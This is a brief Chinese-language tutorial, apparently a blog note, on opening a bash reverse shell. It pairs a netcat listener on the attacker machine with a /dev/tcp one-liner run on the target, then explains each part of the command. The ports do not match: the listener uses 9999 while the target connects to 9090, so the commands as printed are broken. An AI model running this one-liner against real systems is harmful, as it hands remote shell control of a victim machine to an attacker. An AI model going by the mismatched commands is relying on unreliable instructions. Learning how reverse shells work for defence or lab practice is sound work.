不多BB,直接上命令
攻击机:nc -lvp 9999(端口) 告诉攻击机监听自己的9999端口,端口设置成没有被占用的。
靶 机:bash -i >& /dev/tcp/192.168.174.128/9090 0>&1
bash -i 简单理解为"打开"一个shell操作界面;
> 输出重定向;
& 取地址(也可理解为引用);
/dev/tcp/192.168.174.128/9090 和192.168.174.128:9090建立socket连接(简单理解为一个TCP连接);
0>&1;0是标准输入,>是输出重定向,&取地址,1是标准输出 单独的这句话的意思就是把标准输入重定向到标准输出;
连起来从左到右来理解这行命令:"打开"一个靶机的shell,将shell界面通过TCP连接输出到攻击机上,把攻击机输入的值传给靶机,之后通过这个TCP连接来进行交互,从而完成一次反弹shell操作。